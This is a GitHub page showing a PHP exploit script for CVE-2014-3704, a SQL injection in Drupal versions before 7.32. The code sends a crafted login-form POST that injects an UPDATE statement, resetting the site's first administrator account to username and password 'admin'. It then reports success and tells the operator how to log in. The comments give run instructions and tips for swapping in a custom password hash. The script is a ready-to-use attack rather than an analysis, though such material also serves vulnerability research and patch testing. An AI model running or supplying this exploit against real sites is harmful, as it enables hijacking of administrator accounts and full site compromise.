-
Notifications
You must be signed in to change notification settings - Fork 27
/
Copy pathdrupalexploit_2014_3704.php
54 lines (45 loc) · 1.56 KB
/
drupalexploit_2014_3704.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
<?php
# Exploit for CVE-2014-3704
# Based on script from Dustin Dörr
# Koen Van Impe - 20141021
#
# https://www.drupal.org/SA-CORE-2014-005
#
# Drupal vulnerable versions < 7.32
#
#
# run as php drupalexploit_2014_3704.php
#
# Note :
# - the output of the script can return that the exploit
# did not work but this can be due to the Drupal theme
# not returning the full output messages
# (print render($messages) )
#
# - if you want to use your custom supplied user password
# instead of "admin" in the script below then
# you can use the Drupal function user_hash_password
# after including "/includes/password.inc" from the
# Drupal root
$url = 'http://DRUPALSITE';
$username = "admin";
$password = urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g');
$uid = 1;
$sql = "update+{users}+set+name%3D'$username'+,+pass+%3d+'$password'+where+uid+%3D+'$uid'";
$post_data = "name[0%20;$sql;;#%20%20]=vanimpe&name[0]=vanimpe&pass=vanimpe&test2=vanimpe&form_build_id=&form_id=user_login_block&op=Log+in";
$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$data = file_get_contents($url . '?q=node&destination=node', null, stream_context_create( $params ));
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
}
else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
//print_r($data);
?>